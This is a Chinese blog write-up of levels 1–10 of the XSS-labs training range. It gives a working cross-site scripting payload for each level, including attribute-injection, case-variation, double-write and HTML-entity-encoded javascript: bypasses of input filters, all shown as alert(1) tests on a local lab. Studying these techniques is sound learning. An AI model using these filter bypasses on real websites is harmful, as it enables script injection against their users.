XSSlab闯关记录(1~10关)

最新推荐文章于 2024-08-06 23:05:42 发布
最新推荐文章于 2024-08-06 23:05:42 发布
阅读量446 收藏 1
点赞数
文章标签: php 安全 系统安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56375711/article/details/128218587
版权

第一关

查看第一关源代码发现直接将用户的参数显示,没有任何防护措施,构造payload:

127.0.0.1/xss/xss-labs-master/level1.php?name=<script>alert(1)</script> 

 

成功

 

第二关 

 查看第二关源代码,发现使用htmlspecialchars()函数将输入进行了实体转换。把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体

 输入javascipt:“alert(1)”,发现value处没有进行转义,找到注入点,需要闭合前面的“,构造payload:

http://127.0.0.1/xss/xss-labs-master/level2.php?keyword="οnclick="alert(1)&submit=搜索

 成功

 

第三关

 

 输入'οnclick="alert(1)"//,发现上下两处都被转义。那就不用<>"等字符。

构造payload:'οnclick=javascript:alert(1)//

 成功

 第四关

 输入sss<>"  发现下面的双引号没有屏蔽 但尖括号被屏蔽

构造payload:"οnclick="alert(1)

 成功

查看源码,发现只是对尖括号进行了替换

 

 第五关

输入<>",发现他们都可以正常显示。

构造payload:"οnclick="alert(1)

 

 失败,发现on之间加了下划线

查看源码,网站对on和script进行了处理

构造payload:

"><a href="javascript:alert(1)">

成功

 

 

 第六关

查看源码,发现对更多的符号进行了处理,所以不能使用上一关的href作为payload 

 

尝试大小写绕过,构造payload:

"ONclick="alert(1) 

 成功

第七关 

查看源码,发现对敏感字符串进行了替换为空的操作,那就很明显使用双写绕过即可。、

构造payload:

"oonnclick="alert(1) 

 成功

 

 第八关

 查看网页源码,发现几乎所以的敏感字符都被过滤,且忽略大小写,加下划线,所以不能用大小写绕过和双写绕过。

 尝试实体字符编码绕过,将javascript:alert(1)进行实体字符编码

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

成功 

第九关 

查看网页源码,发现比上一关多了http://的校验

构造payload:javascript:alert(1)//http://

html实体字符转换:&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;//http://

中间的//目的是把http://注释掉,否则无法弹窗 

成功

 

第十关

首先输入<>",发现页面回显只有一处,并进行了转义,无法注入。但下面发现了隐藏属性的input框,可以尝试注入。 

 

 源码中t_sort参数进行了回显,注入点找到。

 

构造payload:

http://127.0.0.1/xss/xss-labs-master/level10.php?keyword=111&t_sort="οnmοuseοver="alert(1)

 这里需要f12之后将hidden属性删除。

成功

m0_56375711
关注
XSS-labs
Mccc_li的博客
04-09 1089
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
xsslab--02
weixin_43873557的博客
09-10 145
<!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() { confirm("完成的不错!"); window.location.href="level4.php?keyword=try
xsslab
m0_65151172的博客
04-08 155
(解释一下onclick函数,正常格式的onclick是这样的onclick='alert(1)',这个函数是在点击的时候触发的,之所以我们注入代码是这样的' onclick='alert(1)是因为onclick函数得在一个标签中才能被浏览器识别,所以我们第一个单引号是用来闭合value='这个单引号的,第二个单引号是用来和'>这个单引号形成闭合构成onclick正常的语句的,而且,第一个单引号和onclick 中间得有空格,这样onclick才能被识别出来是个函数 )">xss</a>,成了!
xss漏洞(五,xss-labs靶场搭建及简单讲解)
最新发布
2302_80280669的博客
08-06 784
本文基于github上的xss-labs靶场以及PHP study进行操作。
xss lab
None
11-12 843
xss lab靶场实战,共20道题目,考察多种xss漏洞绕过手段与xss技巧
xss-labs
2302_80044238的博客
03-23 1065
jsp的全称是java servlet page 它就是java的服务器页面因为它相对于servlet传回数据的方法比较简单Servlet的本质是一个,旨在处理HTTP请求并生成HTTP响应。
XSSLab (1~10)
开心星人的博客
05-14 316
一 http://test.ctf8.com/level1.php?name=<script>alert(1)</script> 二 输入<script>alert(1)</script> 查看源码看到<input name=keyword value="<script>alert(1)<script>"> 构造 " onclick="alert(1) 三 输入" onclick="alert(1) 查看源码看到<i
XSSlab靶场通(1~20
06-10
适合刚开始学习xss漏洞,将xsslab靶场作为练习对象。
【渗透测试】---xss-labs闯关【15-18
qq_43168364的博客
08-22 1596
第十五 这一使用了AngularJS框架,它可以通过<script>标签添加到HTML页面,它通过指令(其实就是新的属性)扩展了HTML。 服务器端代码解析 前端代码解析 ng-app 指令 ---- 初始化一个 AngularJS 应用程序。 ng-include 指令 ---- 用于包含外部的 HTML 文件。ng-include 属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一个域名下。(它的作用有点类似于PHP中的include函数) 这里可以让n
xss lab 靶场练习(1~10
m0_52438027的博客
08-05 272
在下面的语法中我们可以看到,他默认编码双引号,但需要ent_quotes这个函数才可以同时编码双引号和单引号,而源码中并没有这个函数,并且源码中是用单引号来闭合的,所以我们可以通过单引号来逃离限制。第十没有输入的地方这是我们打开源码发现只有在input下才可以注入,但我们发现只有在t_sort下才可以注入其他的不行。这里我们可以看到我们输入的内容在href标签下并且不能逃离双引号的限制,所以我们只能通过JavaScript标签来绕过。我们可以通过闭合双引号的方式来使我们的语句逃离他的限制。...
当黑客就入门 XSS-Lab第五
Tuye的博客
07-19 555
第一步:判断是否存在漏洞 输入的内有有回显,故存在漏洞 第二步:尝试利用漏洞 Payload: 1987"><script>alert("yes")</script> 现象: 使用html事件进行尝试: 1987"oninput=“alert('yes') 构造一个Payload闭合闭合原标签,重新创建一个a标签 a标签中引入一个script超链接来调用弹窗...
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
xsslab练习
menghuangjh的博客
10-26 260
第七 输入一波键词,发现都被过滤,类似于文件上传。 想到了双写绕过,试了一下 发现可行,构造payload:"><sscriptcript>alert('1')</scripscriptt><" 第八 还是先来试一下发现<>和"被过滤所以考虑用Javascript:alert(1) 发现被script被替换了。试了下双写还是不行。最后试了下html的实体编码。发现可以绕过。于是构造payload:&#106;&#97;&#...
XSS-Lab 1-10
qq_51558360的博客
03-21 313
不使用过滤器 name=<script>alert(1)</script> 闭合标签 输入第一题的答案,没有成功,查看源码,发现: 我们输入的数据,是在表单中的value属性内 法一: 所以需要先闭合input标签,然后在注入代码,闭合标签: "><script>alert(1)</script> 法二: 是闭合value属性,然后在input标签内加入事件属性: " οnclick="alert(11) 单引号闭合并添加事件 输入测试
xss初识(xss-lab
weixin_72202802的博客
06-21 876
XSS被称为跨站脚本攻击(Cross-site scripting),由于和CSS(CascadingStyle Sheets) 重名,所以改为XSSXSS主要基于javascript语言完成恶意的攻击行为,因为javascript可以非常灵活的操作html、css和浏览器XSS就是指通过利用网页开发时留下的漏洞(由于Web应用程序对用户的输入过滤不足),巧妙的将恶意代码注入到网页中,使用户浏览器加载并执行攻击者制造的恶意代码,以达到攻击的效果。
xsslab随笔
weixin_42306891的博客
07-03 199
这里采用火狐浏览器本地环境搭建,项目地址:https://github.com/do0dl3/xss-labs lab1 查看源代码 和url对照 是直接将传入的name在插入在标签之间,而且返回了字符串长度,所以这里尝试反射性xss,?name=<script>alert('xss')</script>,其实若分析对应php代码,发现,他将name使用get方式传入字符串放入<h2></h2>中,未进行防护过滤,所以存在反射性xss
XSS-Lab 1-15
震山的博客
08-25 329
个人 XSS-Lab记录
XSS-LabXSS注入笔记1-16)
小谢的博客
10-29 5058
XSS-LabXSS注入笔记1-16)
XSS靶场闯关(xss-labs)
小郑的博客
04-22 2074
对数据进行了是否含有http://做了判断,并对键字做了替换,把数据加到了a标签的href属性中,在属性中的数据可以考虑编码,并利用js的注释符//注释掉http://当前页面上有两个输出地方,一个输出到了h2标签,后台进行了实体编码,另一个输出到input标签的value属性,没有进行html实体编码,考虑闭合input标签。对on,script进行了替换,将数据加到了input标签的value属性中,没有进行实体编码处理,可以考虑a标签的href属性,可以直接写伪协议。
XSSlab入门实战:20攻擂指南
2. XSSlab第一关: - 游戏的第一步是测试网页的过滤规则,例如尝试输入`<script>'Oonn>`,由于浏览器解析HTML时会删除或转义这些标签,导致页面空白,这是过滤器在起作用的体现。 - 接下来的学习阶段,玩家需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值